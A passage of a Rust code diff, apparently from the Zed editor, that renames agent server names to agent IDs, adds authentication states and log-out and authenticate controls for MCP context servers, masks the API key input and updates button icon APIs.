settings::CustomAgentServerSettings::Custom { default_model, .. }
@@ -178,7 +183,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().as_ref())
.cloned()
});
@@ -200,13 +205,13 @@ impl AgentServer for CustomAgentServer {
fs: Arc<dyn Fs>,
cx: &App,
) {
- let name = self.name();
+ let agent_id = self.agent_id();
update_settings_file(fs, cx, move |settings, cx| {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
let favorite_models = match settings {
settings::CustomAgentServerSettings::Custom {
@@ -235,7 +240,7 @@ impl AgentServer for CustomAgentServer {
let settings = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().as_ref())
.cloned()
});
@@ -251,15 +256,15 @@ impl AgentServer for CustomAgentServer {
fs: Arc<dyn Fs>,
cx: &mut App,
) {
- let name = self.name();
+ let agent_id = self.agent_id();
let config_id = config_id.to_string();
let value_id = value_id.map(|s| s.to_string());
update_settings_file(fs, cx, move |settings, cx| {
let settings = settings
.agent_servers
.get_or_insert_default()
- .entry(name.to_string())
- .or_insert_with(|| default_settings_for_agent(&name, cx));
+ .entry(agent_id.0.to_string())
+ .or_insert_with(|| default_settings_for_agent(agent_id, cx));
match settings {
settings::CustomAgentServerSettings::Custom {
@@ -287,21 +292,17 @@ impl AgentServer for CustomAgentServer {
fn connect(
&self,
delegate: AgentServerDelegate,
+ project: Entity<Project>,
cx: &mut App,
) -> Task<Result<Rc<dyn AgentConnection>>> {
- let name = self.name();
- let display_name = delegate
- .store
- .read(cx)
- .agent_display_name(&ExternalAgentServerName(name.clone()))
- .unwrap_or_else(|| name.clone());
+ let agent_id = self.agent_id();
let default_mode = self.default_mode(cx);
let default_model = self.default_model(cx);
- let is_registry_agent = is_registry_agent(&name, cx);
+ let is_registry_agent = is_registry_agent(agent_id.clone(), cx);
let default_config_options = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(self.name().as_ref())
+ .get(self.agent_id().as_ref())
.map(|s| match s {
project::agent_server_store::CustomAgentServerSettings::Custom {
default_config_options,
@@ -330,11 +331,11 @@ impl AgentServer for CustomAgentServer {
extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned());
}
if is_registry_agent {
- match name.as_ref() {
- CLAUDE_AGENT_NAME => {
+ match agent_id.as_ref() {
+ CLAUDE_AGENT_ID => {
extra_env.insert("ANTHROPIC_API_KEY".into(), "".into());
}
- CODEX_NAME => {
+ CODEX_ID => {
if let Ok(api_key) = std::env::var("CODEX_API_KEY") {
extra_env.insert("CODEX_API_KEY".into(), api_key);
}
@@ -342,7 +343,7 @@ impl AgentServer for CustomAgentServer {
extra_env.insert("OPEN_AI_API_KEY".into(), api_key);
}
}
- GEMINI_NAME => {
+ GEMINI_ID => {
extra_env.insert("SURFACE".to_owned(), "zed".to_owned());
}
_ => {}
@@ -350,29 +351,26 @@ impl AgentServer for CustomAgentServer {
}
let store = delegate.store.downgrade();
cx.spawn(async move |cx| {
- if is_registry_agent && name.as_ref() == GEMINI_NAME {
+ if is_registry_agent && agent_id.as_ref() == GEMINI_ID {
if let Some(api_key) = cx.update(api_key_for_gemini_cli).await.ok() {
extra_env.insert("GEMINI_API_KEY".into(), api_key);
}
}
let command = store
.update(cx, |store, cx| {
- let agent = store
- .get_external_agent(&ExternalAgentServerName(name.clone()))
- .with_context(|| {
- format!("Custom agent server `{}` is not registered", name)
- })?;
+ let agent = store.get_external_agent(&agent_id).with_context(|| {
+ format!("Custom agent server `{}` is not registered", agent_id)
+ })?;
anyhow::Ok(agent.get_command(
extra_env,
- delegate.status_tx,
delegate.new_version_available,
&mut cx.to_async(),
))
})??
.await?;
let connection = crate::acp::connect(
- name,
- display_name,
+ agent_id,
+ project,
command,
default_mode,
default_model,
@@ -406,15 +404,15 @@ fn api_key_for_gemini_cli(cx: &mut App) -> Task<Result<String>> {
})
}
-fn is_registry_agent(name: &str, cx: &App) -> bool {
- let is_previous_built_in = matches!(name, CLAUDE_AGENT_NAME | CODEX_NAME | GEMINI_NAME);
+fn is_registry_agent(agent_id: impl Into<AgentId>, cx: &App) -> bool {
+ let agent_id = agent_id.into();
let is_in_registry = project::AgentRegistryStore::try_global(cx)
- .map(|store| store.read(cx).agent(name).is_some())
+ .map(|store| store.read(cx).agent(&agent_id).is_some())
.unwrap_or(false);
let is_settings_registry = cx.read_global(|settings: &SettingsStore, _| {
settings
.get::<AllAgentServersSettings>(None)
- .get(name)
+ .get(agent_id.as_ref())
.is_some_and(|s| {
matches!(
s,
@@ -422,11 +420,14 @@ fn is_registry_agent(name: &str, cx: &App) -> bool {
)
})
});
- is_previous_built_in || is_in_registry || is_settings_registry
+ is_in_registry || is_settings_registry
}
-fn default_settings_for_agent(name: &str, cx: &App) -> settings::CustomAgentServerSettings {
- if is_registry_agent(name, cx) {
+fn default_settings_for_agent(
+ agent_id: impl Into<AgentId>,
+ cx: &App,
+) -> settings::CustomAgentServerSettings {
+ if is_registry_agent(agent_id, cx) {
settings::CustomAgentServerSettings::Registry {
default_model: None,
default_mode: None,
@@ -456,6 +457,7 @@ mod tests {
AgentRegistryStore, RegistryAgent, RegistryAgentMetadata, RegistryNpxAgent,
};
use settings::Settings as _;
+ use ui::SharedString;
fn init_test(cx: &mut TestAppContext) {
cx.update(|cx| {
@@ -471,11 +473,12 @@ mod tests {
let id = SharedString::from(id.to_string());
RegistryAgent::Npx(RegistryNpxAgent {
metadata: RegistryAgentMetadata {
- id: id.clone(),
+ id: AgentId::new(id.clone()),
name: id.clone(),
description: SharedString::from(""),
version: SharedString::from("1.0.0"),
repository: None,
+ website: None,
icon_path: None,
},
package: id,
@@ -506,16 +509,6 @@ mod tests {
});
}
- #[gpui::test]
- fn test_previous_builtins_are_registry(cx: &mut TestAppContext) {
- init_test(cx);
- cx.update(|cx| {
- assert!(is_registry_agent(CLAUDE_AGENT_NAME, cx));
- assert!(is_registry_agent(CODEX_NAME, cx));
- assert!(is_registry_agent(GEMINI_NAME, cx));
- });
- }
-
#[gpui::test]
fn test_unknown_agent_is_not_registry(cx: &mut TestAppContext) {
init_test(cx);
@@ -578,25 +571,6 @@ mod tests {
});
}
- #[gpui::test]
- fn test_default_settings_for_builtin_agent(cx: &mut TestAppContext) {
- init_test(cx);
- cx.update(|cx| {
- assert!(matches!(
- default_settings_for_agent(CODEX_NAME, cx),
- settings::CustomAgentServerSettings::Registry { .. }
- ));
- assert!(matches!(
- default_settings_for_agent(CLAUDE_AGENT_NAME, cx),
- settings::CustomAgentServerSettings::Registry { .. }
- ));
- assert!(matches!(
- default_settings_for_agent(GEMINI_NAME, cx),
- settings::CustomAgentServerSettings::Registry { .. }
- ));
- });
- }
-
#[gpui::test]
fn test_default_settings_for_extension_agent(cx: &mut TestAppContext) {
init_test(cx);
@@ -14,6 +14,7 @@ use std::{
time::Duration,
};
use util::path;
+use util::path_list::PathList;
pub async fn test_basic<T, F>(server: F, cx: &mut TestAppContext)
where
@@ -207,8 +208,10 @@ pub async fn test_tool_call_with_permission<T, F>(
thread.update(cx, |thread, cx| {
thread.authorize_tool_call(
tool_call_id,
- allow_option_id,
- acp::PermissionOptionKind::AllowOnce,
+ acp_thread::SelectedPermissionOutcome::new(
+ allow_option_id,
+ acp::PermissionOptionKind::AllowOnce,
+ ),
cx,
);
@@ -431,13 +434,18 @@ pub async fn new_test_thread(
cx: &mut TestAppContext,
) -> Entity<AcpThread> {
let store = project.read_with(cx, |project, _| project.agent_server_store().clone());
- let delegate = AgentServerDelegate::new(store, project.clone(), None, None);
+ let delegate = AgentServerDelegate::new(store, None);
- let connection = cx.update(|cx| server.connect(delegate, cx)).await.unwrap();
-
- cx.update(|cx| connection.new_session(project.clone(), current_dir.as_ref(), cx))
+ let connection = cx
+ .update(|cx| server.connect(delegate, project.clone(), cx))
.await
- .unwrap()
+ .unwrap();
+
+ cx.update(|cx| {
+ connection.new_session(project.clone(), PathList::new(&[current_dir.as_ref()]), cx)
+ })
+ .await
+ .unwrap()
}
pub async fn run_until_first_tool_call(
@@ -12,7 +12,7 @@ use schemars::JsonSchema;
use serde::{Deserialize, Serialize};
use settings::{
DefaultAgentView, DockPosition, LanguageModelParameters, LanguageModelSelection,
- NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode,
+ NewThreadLocation, NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode,
};
pub use crate::agent_profile::*;
@@ -51,6 +51,7 @@ pub struct AgentSettings {
pub message_editor_min_lines: usize,
pub show_turn_stats: bool,
pub tool_permissions: ToolPermissions,
+ pub new_thread_location: NewThreadLocation,
}
impl AgentSettings {
@@ -438,6 +439,7 @@ impl Settings for AgentSettings {
message_editor_min_lines: agent.message_editor_min_lines.unwrap(),
show_turn_stats: agent.show_turn_stats.unwrap(),
tool_permissions: compile_tool_permissions(agent.tool_permissions),
+ new_thread_location: agent.new_thread_location.unwrap_or_default(),
}
}
}
@@ -34,7 +34,7 @@ agent_servers.workspace = true
agent_settings.workspace = true
ai_onboarding.workspace = true
anyhow.workspace = true
-arrayvec.workspace = true
+heapless.workspace = true
assistant_text_thread.workspace = true
assistant_slash_command.workspace = true
assistant_slash_commands.workspace = true
@@ -28,7 +28,7 @@ use language_model::{
use language_models::AllLanguageModelSettings;
use notifications::status_toast::{StatusToast, ToastIcon};
use project::{
- agent_server_store::{AgentServerStore, ExternalAgentServerName, ExternalAgentSource},
+ agent_server_store::{AgentId, AgentServerStore, ExternalAgentSource},
context_server_store::{ContextServerConfiguration, ContextServerStatus, ContextServerStore},
};
use settings::{Settings, SettingsStore, update_settings_file};
@@ -228,6 +228,7 @@ impl AgentConfiguration {
.unwrap_or(false);
v_flex()
+ .min_w_0()
.w_full()
.when(is_expanded, |this| this.mb_2())
.child(
@@ -312,6 +313,7 @@ impl AgentConfiguration {
)
.child(
v_flex()
+ .min_w_0()
.w_full()
.px_2()
.gap_1()
@@ -330,10 +332,11 @@ impl AgentConfiguration {
.full_width()
.style(ButtonStyle::Outlined)
.layer(ElevationIndex::ModalSurface)
- .icon_position(IconPosition::Start)
- .icon(IconName::Thread)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Thread)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.on_click(cx.listener({
let provider = provider.clone();
@@ -355,10 +358,11 @@ impl AgentConfiguration {
)
.full_width()
.style(ButtonStyle::Outlined)
- .icon_position(IconPosition::Start)
- .icon(IconName::Trash)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Trash)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.on_click(cx.listener({
let provider = provider.clone();
@@ -424,10 +428,11 @@ impl AgentConfiguration {
.trigger(
Button::new("add-provider", "Add Provider")
.style(ButtonStyle::Outlined)
- .icon_position(IconPosition::Start)
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small),
)
.menu({
@@ -459,6 +464,7 @@ impl AgentConfiguration {
});
v_flex()
+ .min_w_0()
.w_full()
.child(self.render_section_title(
"LLM Providers",
@@ -498,6 +504,7 @@ impl AgentConfiguration {
Plan::ZedFree => ("Free", Color::Default, free_chip_bg),
Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg),
Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg),
+ Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg),
Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg),
};
@@ -510,21 +517,18 @@ impl AgentConfiguration {
}
}
- fn render_context_servers_section(
- &mut self,
- window: &mut Window,
- cx: &mut Context<Self>,
- ) -> impl IntoElement {
+ fn render_context_servers_section(&mut self, cx: &mut Context<Self>) -> impl IntoElement {
let context_server_ids = self.context_server_store.read(cx).server_ids();
let add_server_popover = PopoverMenu::new("add-server-popover")
.trigger(
Button::new("add-server", "Add Server")
.style(ButtonStyle::Outlined)
- .icon_position(IconPosition::Start)
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small),
)
.menu({
@@ -559,6 +563,7 @@ impl AgentConfiguration {
});
v_flex()
+ .min_w_0()
.border_b_1()
.border_color(cx.theme().colors().border)
.child(self.render_section_title(
@@ -592,7 +597,7 @@ impl AgentConfiguration {
} else {
parent.children(itertools::intersperse_with(
context_server_ids.iter().cloned().map(|context_server_id| {
- self.render_context_server(context_server_id, window, cx)
+ self.render_context_server(context_server_id, cx)
.into_any_element()
}),
|| {
@@ -609,7 +614,6 @@ impl AgentConfiguration {
fn render_context_server(
&self,
context_server_id: ContextServerId,
- window: &mut Window,
cx: &Context<Self>,
) -> impl use<> + IntoElement {
let server_status = self
@@ -637,6 +641,9 @@ impl AgentConfiguration {
} else {
None
};
+ let auth_required = matches!(server_status, ContextServerStatus::AuthRequired);
+ let authenticating = matches!(server_status, ContextServerStatus::Authenticating);
+ let context_server_store = self.context_server_store.clone();
let tool_count = self
.context_server_registry
@@ -680,11 +687,33 @@ impl AgentConfiguration {
Indicator::dot().color(Color::Muted).into_any_element(),
"Server is stopped.",
),
+ ContextServerStatus::AuthRequired => (
+ Indicator::dot().color(Color::Warning).into_any_element(),
+ "Authentication required.",
+ ),
+ ContextServerStatus::Authenticating => (
+ Icon::new(IconName::LoadCircle)
+ .size(IconSize::XSmall)
+ .color(Color::Accent)
+ .with_keyed_rotate_animation(
+ SharedString::from(format!("{}-authenticating", context_server_id.0)),
+ 3,
+ )
+ .into_any_element(),
+ "Waiting for authorization...",
+ ),
};
+
let is_remote = server_configuration
.as_ref()
.map(|config| matches!(config.as_ref(), ContextServerConfiguration::Http { .. }))
.unwrap_or(false);
+
+ let should_show_logout_button = server_configuration.as_ref().is_some_and(|config| {
+ matches!(config.as_ref(), ContextServerConfiguration::Http { .. })
+ && !config.has_static_auth_header()
+ });
+
let context_server_configuration_menu = PopoverMenu::new("context-server-config-menu")
.trigger_with_tooltip(
IconButton::new("context-server-config-menu", IconName::Settings)
@@ -699,6 +728,7 @@ impl AgentConfiguration {
let language_registry = self.language_registry.clone();
let workspace = self.workspace.clone();
let context_server_registry = self.context_server_registry.clone();
+ let context_server_store = context_server_store.clone();
move |window, cx| {
Some(ContextMenu::build(window, cx, |menu, _window, _cx| {
@@ -745,6 +775,17 @@ impl AgentConfiguration {
.ok();
}
}))
+ .when(should_show_logout_button, |this| {
+ this.entry("Log Out", None, {
+ let context_server_store = context_server_store.clone();
+ let context_server_id = context_server_id.clone();
+ move |_window, cx| {
+ context_server_store.update(cx, |store, cx| {
+ store.logout_server(&context_server_id, cx).log_err();
+ });
+ }
+ })
+ })
.separator()
.entry("Uninstall", None, {
let fs = fs.clone();
@@ -801,10 +842,16 @@ impl AgentConfiguration {
}
});
+ let feedback_base_container =
+ || h_flex().py_1().min_w_0().w_full().gap_1().justify_between();
+
v_flex()
+ .min_w_0()
.id(item_id.clone())
.child(
h_flex()
+ .min_w_0()
+ .w_full()
.justify_between()
.child(
h_flex()
@@ -820,13 +867,13 @@ impl AgentConfiguration {
.tooltip(Tooltip::text(tooltip_text))
.child(status_indicator),
)
- .child(Label::new(item_id).truncate())
+ .child(Label::new(item_id).flex_shrink_0().truncate())
.child(
div()
.id("extension-source")
+ .min_w_0()
.mt_0p5()
.mx_1()
- .flex_none()
.tooltip(Tooltip::text(source_tooltip))
.child(
Icon::new(source_icon)
@@ -856,6 +903,7 @@ impl AgentConfiguration {
.on_click({
let context_server_manager = self.context_server_store.clone();
let fs = self.fs.clone();
+ let context_server_id = context_server_id.clone();
move |state, _window, cx| {
let is_enabled = match state {
@@ -903,32 +951,113 @@ impl AgentConfiguration {
)
.map(|parent| {
if let Some(error) = error {
+ return parent
+ .child(
+ feedback_base_container()
+ .child(
+ h_flex()
+ .pr_4()
+ .min_w_0()
+ .w_full()
+ .gap_2()
+ .child(
+ Icon::new(IconName::XCircle)
+ .size(IconSize::XSmall)
+ .color(Color::Error),
+ )
+ .child(
+ div().min_w_0().flex_1().child(
+ Label::new(error)
+ .color(Color::Muted)
+ .size(LabelSize::Small),
+ ),
+ ),
+ )
+ .when(should_show_logout_button, |this| {
+ this.child(
+ Button::new("error-logout-server", "Log Out")
+ .style(ButtonStyle::Outlined)
+ .label_size(LabelSize::Small)
+ .on_click({
+ let context_server_store =
+ context_server_store.clone();
+ let context_server_id =
+ context_server_id.clone();
+ move |_event, _window, cx| {
+ context_server_store.update(
+ cx,
+ |store, cx| {
+ store
+ .logout_server(
+ &context_server_id,
+ cx,
+ )
+ .log_err();
+ },
+ );
+ }
+ }),
+ )
+ }),
+ );
+ }
+ if auth_required {
return parent.child(
- h_flex()
- .gap_2()
- .pr_4()
- .items_start()
+ feedback_base_container()
.child(
h_flex()
- .flex_none()
- .h(window.line_height() / 1.6_f32)
- .justify_center()
+ .pr_4()
+ .min_w_0()
+ .w_full()
+ .gap_2()
.child(
- Icon::new(IconName::XCircle)
+ Icon::new(IconName::Info)
.size(IconSize::XSmall)
- .color(Color::Error),
+ .color(Color::Muted),
+ )
+ .child(
+ Label::new("Authenticate to connect this server")
+ .color(Color::Muted)
+ .size(LabelSize::Small),
),
)
.child(
- div().w_full().child(
- Label::new(error)
- .buffer_font(cx)
- .color(Color::Muted)
- .size(LabelSize::Small),
- ),
+ Button::new("error-logout-server", "Authenticate")
+ .style(ButtonStyle::Outlined)
+ .label_size(LabelSize::Small)
+ .on_click({
+ let context_server_store = context_server_store.clone();
+ let context_server_id = context_server_id.clone();
+ move |_event, _window, cx| {
+ context_server_store.update(cx, |store, cx| {
+ store
+ .authenticate_server(&context_server_id, cx)
+ .log_err();
+ });
+ }
+ }),
),
);
}
+ if authenticating {
+ return parent.child(
+ h_flex()
+ .mt_1()
+ .pr_4()
+ .min_w_0()
+ .w_full()
+ .gap_2()
+ .child(
+ div().size_3().flex_shrink_0(), // Alignment Div
+ )
+ .child(
+ Label::new("Authenticating…")
+ .color(Color::Muted)
+ .size(LabelSize::Small),
+ ),
+
+ );
+ }
parent
})
}
@@ -962,10 +1091,11 @@ impl AgentConfiguration {
.trigger(
Button::new("add-agent", "Add Agent")
.style(ButtonStyle::Outlined)
- .icon_position(IconPosition::Start)
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small),
)
.menu({
@@ -1019,6 +1149,7 @@ impl AgentConfiguration {
});
v_flex()
+ .min_w_0()
.border_b_1()
.border_color(cx.theme().colors().border)
.child(
@@ -1089,7 +1220,7 @@ impl AgentConfiguration {
ExternalAgentSource::Custom => None,
};
- let agent_server_name = ExternalAgentServerName(id.clone());
+ let agent_server_name = AgentId(id.clone());
let uninstall_button = match source {
ExternalAgentSource::Extension => Some(
@@ -1217,9 +1348,10 @@ impl Render for AgentConfiguration {
.id("assistant-configuration-content")
.track_scroll(&self.scroll_handle)
.size_full()
+ .min_w_0()
.overflow_y_scroll()
.child(self.render_agent_servers_section(cx))
- .child(self.render_context_servers_section(window, cx))
+ .child(self.render_context_servers_section(cx))
.child(self.render_provider_configuration_section(cx)),
)
.vertical_scrollbar_for(&self.scroll_handle, window, cx),
@@ -68,14 +68,17 @@ impl AddLlmProviderInput {
let provider_name =
single_line_input("Provider Name", provider.name(), None, 1, window, cx);
let api_url = single_line_input("API URL", provider.api_url(), None, 2, window, cx);
- let api_key = single_line_input(
- "API Key",
- "000000000000000000000000000000000000000000000000",
- None,
- 3,
- window,
- cx,
- );
+ let api_key = cx.new(|cx| {
+ InputField::new(
+ window,
+ cx,
+ "000000000000000000000000000000000000000000000000",
+ )
+ .label("API Key")
+ .tab_index(3)
+ .tab_stop(true)
+ .masked(true)
+ });
Self {
provider_name,
@@ -340,10 +343,11 @@ impl AddLlmProviderModal {
.child(Label::new("Models").size(LabelSize::Small))
.child(
Button::new("add-model", "Add Model")
- .icon(IconName::Plus)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.on_click(cx.listener(|this, _, window, cx| {
this.input.add_model(window, cx);
@@ -446,10 +450,11 @@ impl AddLlmProviderModal {
.when(has_more_than_one_model, |this| {
this.child(
Button::new(("remove-model", ix), "Remove Model")
- .icon(IconName::Trash)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Trash)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.style(ButtonStyle::Outlined)
.full_width()
@@ -1,25 +1,27 @@
-use std::sync::{Arc, Mutex};
-
use anyhow::{Context as _, Result};
use collections::HashMap;
use context_server::{ContextServerCommand, ContextServerId};
use editor::{Editor, EditorElement, EditorStyle};
+
use gpui::{
AsyncWindowContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ScrollHandle,
- Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*,
+ Subscription, Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*,
};
use language::{Language, LanguageRegistry};
use markdown::{Markdown, MarkdownElement, MarkdownStyle};
use notifications::status_toast::{StatusToast, ToastIcon};
+use parking_lot::Mutex;
use project::{
context_server_store::{
- ContextServerStatus, ContextServerStore, registry::ContextServerDescriptorRegistry,
+ ContextServerStatus, ContextServerStore, ServerStatusChangedEvent,
+ registry::ContextServerDescriptorRegistry,
},
project_settings::{ContextServerSettings, ProjectSettings},
worktree_store::WorktreeStore,
};
use serde::Deserialize;
use settings::{Settings as _, update_settings_file};
+use std::sync::Arc;
use theme::ThemeSettings;
use ui::{
CommonAnimationExt, KeyBinding, Modal, ModalFooter, ModalHeader, Section, Tooltip,
@@ -237,6 +239,8 @@ fn context_server_input(existing: Option<(ContextServerId, ContextServerCommand)
format!(
r#"{{
+ /// Configure an MCP server that runs locally via stdin/stdout
+ ///
/// The name of your MCP server
"{name}": {{
/// The command which runs the MCP server
@@ -280,6 +284,8 @@ fn context_server_http_input(
format!(
r#"{{
+ /// Configure an MCP server that you connect to over HTTP
+ ///
/// The name of your remote MCP server
"{name}": {{
/// The URL of the remote MCP server
@@ -342,6 +348,8 @@ fn resolve_context_server_extension(
enum State {
Idle,
Waiting,
+ AuthRequired { server_id: ContextServerId },
+ Authenticating { _server_id: ContextServerId },
Error(SharedString),
}
@@ -352,6 +360,7 @@ pub struct ConfigureContextServerModal {
state: State,
original_server_id: Option<ContextServerId>,
scroll_handle: ScrollHandle,
+ _auth_subscription: Option<Subscription>,
}
impl ConfigureContextServerModal {
@@ -475,6 +484,7 @@ impl ConfigureContextServerModal {
cx,
),
scroll_handle: ScrollHandle::new(),
+ _auth_subscription: None,
})
})
})
@@ -486,6 +496,13 @@ impl ConfigureContextServerModal {
}
fn confirm(&mut self, _: &menu::Confirm, cx: &mut Context<Self>) {
+ if matches!(
+ self.state,
+ State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. }
+ ) {
+ return;
+ }
+
self.state = State::Idle;
let Some(workspace) = self.workspace.upgrade() else {
return;
@@ -515,14 +532,19 @@ impl ConfigureContextServerModal {
async move |this, cx| {
let result = wait_for_context_server_task.await;
this.update(cx, |this, cx| match result {
- Ok(_) => {
+ Ok(ContextServerStatus::Running) => {
this.state = State::Idle;
this.show_configured_context_server_toast(id, cx);
cx.emit(DismissEvent);
}
+ Ok(ContextServerStatus::AuthRequired) => {
+ this.state = State::AuthRequired { server_id: id };
+ cx.notify();
+ }
Err(err) => {
this.set_error(err, cx);
}
+ Ok(_) => {}
})
}
})
@@ -558,6 +580,49 @@ impl ConfigureContextServerModal {
cx.emit(DismissEvent);
}
+ fn authenticate(&mut self, server_id: ContextServerId, cx: &mut Context<Self>) {
+ self.context_server_store.update(cx, |store, cx| {
+ store.authenticate_server(&server_id, cx).log_err();
+ });
+
+ self.state = State::Authenticating {
+ _server_id: server_id.clone(),
+ };
+
+ self._auth_subscription = Some(cx.subscribe(
+ &self.context_server_store,
+ move |this, _, event: &ServerStatusChangedEvent, cx| {
+ if event.server_id != server_id {
+ return;
+ }
+ match &event.status {
+ ContextServerStatus::Running => {
+ this._auth_subscription = None;
+ this.state = State::Idle;
+ this.show_configured_context_server_toast(event.server_id.clone(), cx);
+ cx.emit(DismissEvent);
+ }
+ ContextServerStatus::AuthRequired => {
+ this._auth_subscription = None;
+ this.state = State::AuthRequired {
+ server_id: event.server_id.clone(),
+ };
+ cx.notify();
+ }
+ ContextServerStatus::Error(error) => {
+ this._auth_subscription = None;
+ this.set_error(error.clone(), cx);
+ }
+ ContextServerStatus::Authenticating
+ | ContextServerStatus::Starting
+ | ContextServerStatus::Stopped => {}
+ }
+ },
+ ));
+
+ cx.notify();
+ }
+
fn show_configured_context_server_toast(&self, id: ContextServerId, cx: &mut App) {
self.workspace
.update(cx, {
@@ -615,7 +680,8 @@ impl ConfigureContextServerModal {
}
fn render_modal_description(&self, window: &mut Window, cx: &mut Context<Self>) -> AnyElement {
- const MODAL_DESCRIPTION: &str = "Visit the MCP server configuration docs to find all necessary arguments and environment variables.";
+ const MODAL_DESCRIPTION: &str =
+ "Check the server docs for required arguments and environment variables.";
if let ConfigurationSource::Extension {
installation_instructions: Some(installation_instructions),
@@ -637,6 +703,67 @@ impl ConfigureContextServerModal {
}
}
+ fn render_tab_bar(&self, cx: &mut Context<Self>) -> Option<AnyElement> {
+ let is_http = match &self.source {
+ ConfigurationSource::New { is_http, .. } => *is_http,
+ _ => return None,
+ };
+
+ let tab = |label: &'static str, active: bool| {
+ div()
+ .id(label)
+ .cursor_pointer()
+ .p_1()
+ .text_sm()
+ .border_b_1()
+ .when(active, |this| {
+ this.border_color(cx.theme().colors().border_focused)
+ })
+ .when(!active, |this| {
+ this.border_color(gpui::transparent_black())
+ .text_color(cx.theme().colors().text_muted)
+ .hover(|s| s.text_color(cx.theme().colors().text))
+ })
+ .child(label)
+ };
+
+ Some(
+ h_flex()
+ .pt_1()
+ .mb_2p5()
+ .gap_1()
+ .border_b_1()
+ .border_color(cx.theme().colors().border.opacity(0.5))
+ .child(
+ tab("Local", !is_http).on_click(cx.listener(|this, _, window, cx| {
+ if let ConfigurationSource::New { editor, is_http } = &mut this.source {
+ if *is_http {
+ *is_http = false;
+ let new_text = context_server_input(None);
+ editor.update(cx, |editor, cx| {
+ editor.set_text(new_text, window, cx);
+ });
+ }
+ }
+ })),
+ )
+ .child(
+ tab("Remote", is_http).on_click(cx.listener(|this, _, window, cx| {
+ if let ConfigurationSource::New { editor, is_http } = &mut this.source {
+ if !*is_http {
+ *is_http = true;
+ let new_text = context_server_http_input(None);
+ editor.update(cx, |editor, cx| {
+ editor.set_text(new_text, window, cx);
+ });
+ }
+ }
+ })),
+ )
+ .into_any_element(),
+ )
+ }
+
fn render_modal_content(&self, cx: &App) -> AnyElement {
let editor = match &self.source {
ConfigurationSource::New { editor, .. } => editor,
@@ -682,7 +809,10 @@ impl ConfigureContextServerModal {
fn render_modal_footer(&self, cx: &mut Context<Self>) -> ModalFooter {
let focus_handle = self.focus_handle(cx);
- let is_connecting = matches!(self.state, State::Waiting);
+ let is_busy = matches!(
+ self.state,
+ State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. }
+ );
ModalFooter::new()
.start_slot::<Button>(
@@ -693,9 +823,11 @@ impl ConfigureContextServerModal {
{
Some(
Button::new("open-repository", "Open Repository")
- .icon(IconName::ArrowUpRight)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.tooltip({
let repository_url = repository_url.clone();
move |_window, cx| {
@@ -712,36 +844,6 @@ impl ConfigureContextServerModal {
move |_, _, cx| cx.open_url(&repository_url)
}),
)
- } else if let ConfigurationSource::New { is_http, .. } = &self.source {
- let label = if *is_http {
- "Configure Local"
- } else {
- "Configure Remote"
- };
- let tooltip = if *is_http {
- "Configure an MCP server that runs on stdin/stdout."
- } else {
- "Configure an MCP server that you connect to over HTTP"
- };
-
- Some(
- Button::new("toggle-kind", label)
- .tooltip(Tooltip::text(tooltip))
- .on_click(cx.listener(|this, _, window, cx| match &mut this.source {
- ConfigurationSource::New { editor, is_http } => {
- *is_http = !*is_http;
- let new_text = if *is_http {
- context_server_http_input(None)
- } else {
- context_server_input(None)
- };
- editor.update(cx, |editor, cx| {
- editor.set_text(new_text, window, cx);
- })
- }
- _ => {}
- })),
- )
} else {
None
},
@@ -775,7 +877,7 @@ impl ConfigureContextServerModal {
"Configure Server"
},
)
- .disabled(is_connecting)
+ .disabled(is_busy)
.key_binding(
KeyBinding::for_action_in(&menu::Confirm, &focus_handle, cx)
.map(|kb| kb.size(rems_from_px(12.))),
